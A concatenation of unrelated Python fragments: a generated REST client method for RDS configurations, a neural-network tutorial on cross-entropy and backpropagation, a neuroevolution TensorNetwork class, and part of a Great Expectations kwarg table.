def get_rds_config_in_workspace(self, workspace_id, name, **kwargs):
"""
get RDS config by name in workspace
An RDS Configuration describe a connection to an external Relational Database Service that can be used as the Hive Metastore.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_rds_config_in_workspace(workspace_id, name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int workspace_id: (required)
:param str name: (required)
:return: RDSConfigResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_rds_config_in_workspace_with_http_info(workspace_id, name, **kwargs)
else:
(data) = self.get_rds_config_in_workspace_with_http_info(workspace_id, name, **kwargs)
return data
def get_rds_config_in_workspace_with_http_info(self, workspace_id, name, **kwargs):
"""
get RDS config by name in workspace
An RDS Configuration describe a connection to an external Relational Database Service that can be used as the Hive Metastore.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_rds_config_in_workspace_with_http_info(workspace_id, name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int workspace_id: (required)
:param str name: (required)
:return: RDSConfigResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'name']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_rds_config_in_workspace" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `get_rds_config_in_workspace`")
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_rds_config_in_workspace`")
collection_formats = {}
path_params = {}
if 'workspace_id' in | |
= feed_forward(X)
return np.argmax(probabilities, axis=1)
predictions = predict(X_train)
print("predictions = (n_inputs) = " + str(predictions.shape))
print("prediction for image 0: " + str(predictions[0]))
print("correct label for image 0: " + str(Y_train[0]))
### Choose cost function and optimizer
To measure how well our neural network is doing we need to introduce a cost function.
We will call the function that gives the error of a single sample output the *loss* function, and the function
that gives the total error of our network across all samples the *cost* function.
A typical choice for multiclass classification is the *cross-entropy* loss, also known as the negative log likelihood.
In *multiclass* classification it is common to treat each integer label as a so called *one-hot* vector:
$$ y = 5 \quad \rightarrow \quad \hat{y} = (0, 0, 0, 0, 0, 1, 0, 0, 0, 0) ,$$
$$ y = 1 \quad \rightarrow \quad \hat{y} = (0, 1, 0, 0, 0, 0, 0, 0, 0, 0) ,$$
i.e. a binary bit string of length $C$, where $C = 10$ is the number of classes in the MNIST dataset.
Let $y_{ic}$ denote the $c$-th component of the $i$-th one-hot vector.
We define the cost function $\mathcal{C}$ as a sum over the cross-entropy loss for each point $\hat{x}_i$ in the dataset.
In the one-hot representation only one of the terms in the loss function is non-zero, namely the
probability of the correct category $c'$
(i.e. the category $c'$ such that $y_{ic'} = 1$). This means that the cross entropy loss only punishes you for how wrong
you got the correct label. The probability of category $c$ is given by the softmax function. The vector $\hat{\theta}$ represents the parameters of our network, i.e. all the weights and biases.
### Optimizing the cost function
The network is trained by finding the weights and biases that minimize the cost function. One of the most widely used classes of methods is *gradient descent* and its generalizations. The idea behind gradient descent
is simply to adjust the weights in the direction where the gradient of the cost function is large and negative. This ensures we flow toward a *local* minimum of the cost function.
Each parameter $\theta$ is iteratively adjusted according to the rule
$$ \theta_{i+1} = \theta_i - \eta \nabla \mathcal{C}(\theta_i) ,$$
where $\eta$ is known as the *learning rate*, which controls how big a step we take towards the minimum.
This update can be repeated for any number of iterations, or until we are satisfied with the result.
A simple and effective improvement is a variant called *Batch Gradient Descent*.
Instead of calculating the gradient on the whole dataset, we calculate an approximation of the gradient
on a subset of the data called a *minibatch*.
If there are $N$ data points and we have a minibatch size of $M$, the total number of batches
is $N/M$.
We denote each minibatch $B_k$, with $k = 1, 2,...,N/M$. The gradient then becomes:
$$ \nabla \mathcal{C}(\theta) = \frac{1}{N} \sum_{i=1}^N \nabla \mathcal{L}_i(\theta) \quad \rightarrow \quad
\frac{1}{M} \sum_{i \in B_k} \nabla \mathcal{L}_i(\theta) ,$$
i.e. instead of averaging the loss over the entire dataset, we average over a minibatch.
This has two important benefits:
1. Introducing stochasticity decreases the chance that the algorithm becomes stuck in a local minima.
2. It significantly speeds up the calculation, since we do not have to use the entire dataset to calculate the gradient.
The various optmization methods, with codes and algorithms, are discussed in our lectures on [Gradient descent approaches](https://compphysics.github.io/MachineLearning/doc/pub/Splines/html/Splines-bs.html).
### Regularization
It is common to add an extra term to the cost function, proportional
to the size of the weights. This is equivalent to constraining the
size of the weights, so that they do not grow out of control.
Constraining the size of the weights means that the weights cannot
grow arbitrarily large to fit the training data, and in this way
reduces *overfitting*.
We will measure the size of the weights using the so called *L2-norm*, meaning our cost function becomes:
$$ \mathcal{C}(\theta) = \frac{1}{N} \sum_{i=1}^N \mathcal{L}_i(\theta) \quad \rightarrow \quad
\frac{1}{N} \sum_{i=1}^N \mathcal{L}_i(\theta) + \lambda \lvert \lvert \hat{w} \rvert \rvert_2^2
= \frac{1}{N} \sum_{i=1}^N \mathcal{L}(\theta) + \lambda \sum_{ij} w_{ij}^2,$$
i.e. we sum up all the weights squared. The factor $\lambda$ is known as a regularization parameter.
In order to train the model, we need to calculate the derivative of
the cost function with respect to every bias and weight in the
network. In total our network has $(64 + 1)\times 50=3250$ weights in
the hidden layer and $(50 + 1)\times 10=510$ weights to the output
layer ($+1$ for the bias), and the gradient must be calculated for
every parameter. We use the *backpropagation* algorithm discussed
above. This is a clever use of the chain rule that allows us to
calculate the gradient efficently.
### Matrix multiplication
To more efficently train our network these equations are implemented using matrix operations.
The error in the output layer is calculated simply as, with $\hat{t}$ being our targets,
$$ \delta_L = \hat{t} - \hat{y} = (n_{inputs}, n_{categories}) .$$
The gradient for the output weights is calculated as
$$ \nabla W_{L} = \hat{a}^T \delta_L = (n_{hidden}, n_{categories}) ,$$
where $\hat{a} = (n_{inputs}, n_{hidden})$. This simply means that we are summing up the gradients for each input.
Since we are going backwards we have to transpose the activation matrix.
The gradient with respect to the output bias is then
$$ \nabla \hat{b}_{L} = \sum_{i=1}^{n_{inputs}} \delta_L = (n_{categories}) .$$
The error in the hidden layer is
$$ \Delta_h = \delta_L W_{L}^T \circ f'(z_{h}) = \delta_L W_{L}^T \circ a_{h} \circ (1 - a_{h}) = (n_{inputs}, n_{hidden}) ,$$
where $f'(a_{h})$ is the derivative of the activation in the hidden layer. The matrix products mean
that we are summing up the products for each neuron in the output layer. The symbol $\circ$ denotes
the *Hadamard product*, meaning element-wise multiplication.
This again gives us the gradients in the hidden layer:
$$ \nabla W_{h} = X^T \delta_h = (n_{features}, n_{hidden}) ,$$
$$ \nabla b_{h} = \sum_{i=1}^{n_{inputs}} \delta_h = (n_{hidden}) .$$
# to categorical turns our integer vector into a onehot representation
from sklearn.metrics import accuracy_score
# one-hot in numpy
def to_categorical_numpy(integer_vector):
n_inputs = len(integer_vector)
n_categories = np.max(integer_vector) + 1
onehot_vector = np.zeros((n_inputs, n_categories))
onehot_vector[range(n_inputs), integer_vector] = 1
return onehot_vector
#Y_train_onehot, Y_test_onehot = to_categorical(Y_train), to_categorical(Y_test)
Y_train_onehot, Y_test_onehot = to_categorical_numpy(Y_train), to_categorical_numpy(Y_test)
def feed_forward_train(X):
# weighted sum of inputs to the hidden layer
z_h = np.matmul(X, hidden_weights) + hidden_bias
# activation in the hidden layer
a_h = sigmoid(z_h)
# weighted sum of inputs to the output layer
z_o = np.matmul(a_h, output_weights) + output_bias
# softmax output
# axis 0 holds each input and axis 1 the probabilities of each category
exp_term = np.exp(z_o)
probabilities = exp_term / np.sum(exp_term, axis=1, keepdims=True)
# for backpropagation need activations in hidden and output layers
return a_h, probabilities
def backpropagation(X, Y):
a_h, probabilities = feed_forward_train(X)
# error in the output layer
error_output = probabilities - Y
# error in the hidden layer
error_hidden = np.matmul(error_output, output_weights.T) * a_h * (1 - a_h)
# gradients for the output layer
output_weights_gradient = np.matmul(a_h.T, error_output)
output_bias_gradient = np.sum(error_output, axis=0)
# gradient for the hidden layer
hidden_weights_gradient = np.matmul(X.T, error_hidden)
hidden_bias_gradient = np.sum(error_hidden, axis=0)
return output_weights_gradient, output_bias_gradient, hidden_weights_gradient, hidden_bias_gradient
print("Old accuracy on training data: " + str(accuracy_score(predict(X_train), Y_train)))
eta = 0.01
lmbd = 0.01
for i in range(1000):
# calculate gradients
dWo, dBo, dWh, dBh = backpropagation(X_train, Y_train_onehot)
# regularization term gradients
dWo += lmbd * output_weights
dWh += lmbd * hidden_weights
# update weights and biases
output_weights -= eta * dWo
output_bias -= eta * dBo
hidden_weights -= eta * dWh
hidden_bias -= eta * dBh
print("New accuracy on training data: " + str(accuracy_score(predict(X_train), Y_train)))
## Improving performance
As we can see the network does not seem to be learning at all. It seems to be just guessing the label for each image.
In order to obtain a network that does something useful, we will have to do a bit more work.
The choice of *hyperparameters* such as learning | |
"""defines a Tensor Network, which is the class that holds most of our genome information"""
import copy
import itertools
import json
import time
import random
import tensorflow as tf
import networkx as nx
from matplotlib import pyplot as plt
from tensorEvolution import tensor_encoder, evo_config
from tensorEvolution.nodes import tensor_node, io_nodes, node_utils, basic_nodes
class TensorNetwork:
"""Holds all the information that defines the NN gnome"""
id_iter = itertools.count(100)
def __init__(self, input_shapes: list, output_units: list, connected=True,
preprocessing_layers: list = None, initial_nodes: list = None):
self.graph = nx.MultiDiGraph()
self.net_id = next(TensorNetwork.id_iter)
self.all_nodes = {}
self.input_ids = []
self.output_ids = []
self.preprocessing_ids = []
self.initial_ids = []
self.input_shapes = input_shapes
self.output_units = output_units
self.complexity = 0
if connected:
self._create_inputs(input_shapes)
self._create_prenodes_and_outputs(output_units,
preprocessing_layers=preprocessing_layers,
initial_nodes=initial_nodes)
def serialize(self) -> dict:
"""Creates serializable version of this class"""
serial_dict = copy.deepcopy(self.__dict__)
serial_dict['graph'] = nx.node_link_data(self.graph)
for node_id, node in self.all_nodes.items():
serial_node = node.serialize()
(serial_dict['all_nodes'])[node_id] = serial_node
return serial_dict
@staticmethod
def deserialize(tn_dict: dict):
"""Builds a new tensor network from serialized instance
Args:
tn_dict: Serialized Tensor Network
"""
tensor_net = TensorNetwork(None, None, False)
tensor_net.__dict__ = tn_dict
tensor_net.net_id = int(tensor_net.net_id)
tensor_net.all_nodes = {int(k): v for (k, v) in tensor_net.all_nodes.items()}
tensor_net.graph = nx.node_link_graph(tn_dict['graph'])
for node_id, serial_node in tensor_net.all_nodes.items():
tensor_net.all_nodes[node_id] = node_utils.deserialize_node(serial_node)
for index, shape in enumerate(tensor_net.input_shapes):
tensor_net.input_shapes[index] = tuple(shape)
return tensor_net
def __deepcopy__(self, memodict={}):
return self._clone()
def _clone(self):
clone_tn = TensorNetwork(self.input_shapes, self.output_units, connected=False)
node_cross_ref = {}
for node_id, node in self.all_nodes.items():
cloned_node = node.clone()
label_override = None
if cloned_node.is_initial_node:
label_override = "InitialNode"
clone_tn.register_node(cloned_node, label_override=label_override)
node_cross_ref[node_id] = cloned_node.id
for edge in self.graph.edges:
old_start_node = edge[0]
old_end_node = edge[1]
new_start_node = node_cross_ref[old_start_node]
new_end_node = node_cross_ref[old_end_node]
clone_tn.graph.add_edge(new_start_node, new_end_node)
return clone_tn
def _create_inputs(self, input_shapes: list):
for shape in input_shapes:
node = io_nodes.InputNode(shape)
self.register_node(node)
def _create_prenodes_and_outputs(self, output_units: list,
preprocessing_layers: list = None,
initial_nodes: list = None):
# start by creating all the output nodes
for units in output_units:
output_node = io_nodes.OutputNode(units)
self.register_node(output_node)
# now work forward from the inputs
# Handles multiple inputs, assumes there is a preprocessing list defined for each
for index, input_id in enumerate(self.input_ids):
if preprocessing_layers is not None:
# create preprocessing nodes for each input
preprocess_node = basic_nodes.PreprocessingNode(preprocessing_layers[index], index)
self.register_node(preprocess_node)
# connect this preprocessing node to the relevant input node
self.graph.add_edge(input_id, preprocess_node.id)
if initial_nodes is not None:
initial_node_stack = initial_nodes[index]
for initial_node in initial_node_stack:
initial_node.is_initial_node = True
self.register_node(initial_node, label_override="InitialNode")
parent_id = input_id
successors = self.get_successor_chain_ids(input_id)
if len(successors) > 0:
# already has preprocessing node(s)
parent_id = successors[-1]
self.graph.add_edge(parent_id, initial_node.id)
# make the final connection to the outputs
for output_id in self.output_ids:
parent_id = input_id
successors = self.get_successor_chain_ids(input_id)
if len(successors) > 0:
parent_id = successors[-1]
# mark node as final node in preprocessing/initial chain
self.all_nodes[parent_id].is_end_initial_chain = True
self.graph.add_edge(parent_id, output_id)
# deal with multiple inputs being hooked into an output
for output_id in self.output_ids:
parents = get_parents(self, self.all_nodes[output_id])
if len(parents) > 1:
multi_to_single = evo_config.master_config.config["multiple_to_single"]
selection = random.choice(multi_to_single)
reducing_node = node_utils.create(selection)
self.register_node(reducing_node)
for parent in parents:
while self.graph.has_edge(parent.id, output_id):
self.graph.remove_edge(parent.id, output_id)
self.graph.add_edge(parent.id, reducing_node.id)
self.graph.add_edge(reducing_node.id, output_id)
def insert_node_before(self, new_node: tensor_node.TensorNode, existing_node_id=None,
parent_id=None, integrity_check=False):
"""inserts node before the given position.
Positions refer to the index in the "non_input_nodes" list,
which is kept in no particular order
Args:
:param new_node: node to be inserted
:param parent_id: id of parent if explicitly given
:param integrity_check: True if this request made by an integrity check
:param existing_node_id: id of the node to insert before
(assuming random placement is false)
"""
nodes = self.get_valid_insert_positions()
# check if a specific location to insert before was given to us,
# otherwise choose a location at random
if existing_node_id is not None:
child_node = nodes[existing_node_id]
else:
child_node = random.choice(list(nodes.values()))
# gets a list of direct successor nodes
parents = get_parents(self, child_node)
if parent_id is not None:
# we were provided with a specific parent ID. Nodes can have multiple parent,
# and sometimes it is important to specify exactly where the inserted node is going
parent = [node for node in parents if node.id == parent_id][0]
else:
# no explicit parent id given,
# so pick a parent at random (could be there is only one parent)
parent = random.choice(parents) # could be multiple parents
if integrity_check:
# this insertion request came from an integrity check,
# so we need to ensure that all connections between the parent
# and child get a copy of this node inserted. The insertion
# of this node between identified parent and child nodes is vital
# to this network's functionality.
while self.graph.has_edge(parent.id, child_node.id):
# remove an edge between parent and child
self.graph.remove_edge(parent.id, child_node.id)
# copy the node so that each branch has its own version
new_node_copy = new_node.clone()
# register new node to be inserted
self.register_node(new_node_copy)
# add a new edge between parent and new node
self.graph.add_edge(parent.id, new_node_copy.id)
# add new edge between new node and child
self.graph.add_edge(new_node_copy.id, child_node.id)
else:
# request has not come from an integrity check,
# so just remove one of the (possibly) multiple edges between parent and child
# remove an edge between parent and child.
# This is just a standard mutation request,
# not a vital node inserted to ensure the function of the network.
self.graph.remove_edge(parent.id, child_node.id)
# register new node to be inserted
self.register_node(new_node)
# add a new edge between parent and new node
self.graph.add_edge(parent.id, new_node.id)
# add new edge between new node and child
self.graph.add_edge(new_node.id, child_node.id)
if new_node.is_branch_termination:
# get ids of all predecessors recursively back to input node
all_parents_ids = self.get_parent_chain_ids(new_node)
if (len(self.preprocessing_ids) > 0) or (len(self.initial_ids) > 0):
# this network has either preprocessing or initial nodes associated with it
# the input and initial/pre nodes shouldn't be considered valid
# candidates for a branch, except for the final one
removal_list = self.input_ids + self.initial_ids + self.preprocessing_ids
removal_list = [x for x in removal_list if not self.all_nodes[x].is_end_initial_chain]
all_parents_ids = [x for x in all_parents_ids if x not in removal_list]
branch_origin = random.choice(all_parents_ids)
self.graph.add_edge(branch_origin, new_node.id)
def delete_node(self, node_id, replacement_node=None):
"""
deletes a node from the network
:param node_id: node to delete
:param replacement_node: None, unless you intend to replace the node instead of delete it
"""
replace = False
if replacement_node is not None:
replace = True
node_to_remove = self.get_a_middle_node(node_id=node_id)
if node_to_remove.is_branch_termination:
return # deletion of branch endpoints not currently supported
parents = get_parents(self, node_to_remove)
children = self.get_children(node_to_remove)
while self.graph.has_node(node_to_remove.id):
self.graph.remove_node(node_to_remove.id) # also removes adjacent edges
self.all_nodes.pop(node_to_remove.id)
if replace:
self.register_node(replacement_node)
for parent in parents:
self.graph.add_edge(parent.id, replacement_node.id)
for child in children:
self.graph.add_edge(replacement_node.id, child.id)
else:
for parent in parents:
for child in children:
self.graph.add_edge(parent.id, child.id)
def register_node(self, node: tensor_node.TensorNode, label_override=None):
"""
registers a node with the network. Adds it to the graph which holds the
network topology. Also adds it to the main dict of nodes
:param label_override: overrides the default logic which
controls which list of ids the node gets added to
:param node: node to register
"""
self.all_nodes[node.id] = node
if label_override is None:
label = node.get_label()
else:
label = label_override
self.graph.add_node(node.id, label=label)
if label == "InputNode":
self.input_ids.append(node.id)
elif label == "OutputNode":
self.output_ids.append(node.id)
elif label == "PreprocessingNode":
self.preprocessing_ids.append(node.id)
elif label == "InitialNode":
self.initial_ids.append(node.id)
# def replace_node(self, replacement_node: tensor_node.TensorNode,
# position=None, existing_node_id=None):
#
# old_node = self.get_a_middle_node(position, existing_node_id)
#
# if len(list(self.graph.predecessors(old_node.id))) > 1:
# raise ValueError("Tried to replace a node with multiple parents")
#
# self.all_nodes.pop(old_node.id)
# self.all_nodes[replacement_node.id] = replacement_node
#
# parents = self.get_parents(old_node)
# self.graph.remove_node()
# nx.relabel_nodes(self.graph, {old_node.id: replacement_node.id}, copy=False)
# self.graph.nodes[replacement_node.id]['label'] = replacement_node.get_label()
def remove_chain(self, id_chain: list, heal=True, replace=False, new_chain_nodes: list = None):
"""
Removes an entire chain of linked nodes
:param id_chain: list of node ids to be removed
:param heal: re-connect nodes after removal
:param replace: replace the removed chain with a new chain
:param new_chain_nodes: chain to replace with
"""
start_node = self.get_a_middle_node(node_id=id_chain[0])
end_node = self.get_a_middle_node(node_id=id_chain[-1])
start_parents = get_parents(self, start_node)
end_children = self.get_children(end_node)
for node_id in id_chain:
self.all_nodes.pop(node_id)
self.graph.remove_nodes_from(id_chain)
if heal:
for parent in start_parents:
for child in end_children:
self.graph.add_edge(parent.id, child.id)
if replace:
current_parents = start_parents
for node in new_chain_nodes:
self.register_node(node)
for parent in current_parents:
self.graph.add_edge(parent.id, node.id)
| |
not in metric_kwargs:
metric_kwargs[kwargs_id] = set()
for metric_name in metric_list:
metric_kwargs[kwargs_id].add(metric_name)
deduplicated[suite_name] = list(metrics)
if len(metric_kwargs) > 0:
deduplicated[suite_name] = deduplicated[suite_name] + [
{
"metric_kwargs_id": {
metric_kwargs: list(metrics_set)
for (metric_kwargs, metrics_set) in metric_kwargs.items()
}
}
]
return deduplicated
class ExpectationConfiguration(DictDot):
"""ExpectationConfiguration defines the parameters and name of a specific expectation."""
kwarg_lookup_dict = {
"expect_column_to_exist": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["column_index"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"column_index": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_table_columns_to_match_ordered_list": {
"domain_kwargs": [],
"success_kwargs": ["column_list"],
"default_kwarg_values": {
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_table_column_count_to_be_between": {
"domain_kwargs": [],
"success_kwargs": ["min_value", "max_value"],
"default_kwarg_values": {
"min_value": None,
"max_value": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_table_column_count_to_equal": {
"domain_kwargs": [],
"success_kwargs": ["value"],
"default_kwarg_values": {
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_table_row_count_to_be_between": {
"domain_kwargs": [],
"success_kwargs": ["min_value", "max_value"],
"default_kwarg_values": {
"min_value": None,
"max_value": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_table_row_count_to_equal": {
"domain_kwargs": [],
"success_kwargs": ["value"],
"default_kwarg_values": {
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_be_unique": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_not_be_null": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_be_null": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_be_of_type": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["type_", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_be_in_type_list": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["type_list", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_be_in_set": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["value_set", "mostly", "parse_strings_as_datetimes"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"parse_strings_as_datetimes": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_not_be_in_set": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["value_set", "mostly", "parse_strings_as_datetimes"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"parse_strings_as_datetimes": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_be_between": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": [
"min_value",
"max_value",
"strict_min",
"strict_max",
"allow_cross_type_comparisons",
"parse_strings_as_datetimes",
"output_strftime_format",
"mostly",
],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"min_value": None,
"max_value": None,
"strict_min": False,
"strict_max": False,
"allow_cross_type_comparisons": None,
"parse_strings_as_datetimes": None,
"output_strftime_format": None,
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_be_increasing": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["strictly", "parse_strings_as_datetimes", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"strictly": None,
"parse_strings_as_datetimes": None,
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_be_decreasing": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["strictly", "parse_strings_as_datetimes", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"strictly": None,
"parse_strings_as_datetimes": None,
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_value_lengths_to_be_between": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["min_value", "max_value", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"min_value": None,
"max_value": None,
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_value_lengths_to_equal": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["value", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_match_regex": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["regex", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_not_match_regex": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["regex", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_match_regex_list": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["regex_list", "match_on", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"match_on": "any",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_not_match_regex_list": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["regex_list", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_match_strftime_format": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["strftime_format", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_be_dateutil_parseable": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_be_json_parseable": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_values_to_match_json_schema": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["json_schema", "mostly"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"mostly": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_parameterized_distribution_ks_test_p_value_to_be_greater_than": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["distribution", "p_value", "params"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"p_value": 0.05,
"params": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_distinct_values_to_be_in_set": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["value_set", "parse_strings_as_datetimes"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"parse_strings_as_datetimes": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_distinct_values_to_equal_set": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["value_set", "parse_strings_as_datetimes"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"parse_strings_as_datetimes": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_distinct_values_to_contain_set": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["value_set", "parse_strings_as_datetimes"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"parse_strings_as_datetimes": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_mean_to_be_between": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["min_value", "max_value", "strict_min", "strict_max"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"min_value": None,
"max_value": None,
"strict_min": False,
"strict_max": False,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_median_to_be_between": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["min_value", "max_value", "strict_min", "strict_max"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"min_value": None,
"max_value": None,
"strict_min": False,
"strict_max": False,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_quantile_values_to_be_between": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["quantile_ranges", "allow_relative_error"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"allow_relative_error": False,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_stdev_to_be_between": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["min_value", "max_value", "strict_min", "strict_max"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"min_value": None,
"max_value": None,
"strict_min": False,
"strict_max": False,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_unique_value_count_to_be_between": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["min_value", "max_value"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"min_value": None,
"max_value": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_proportion_of_unique_values_to_be_between": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
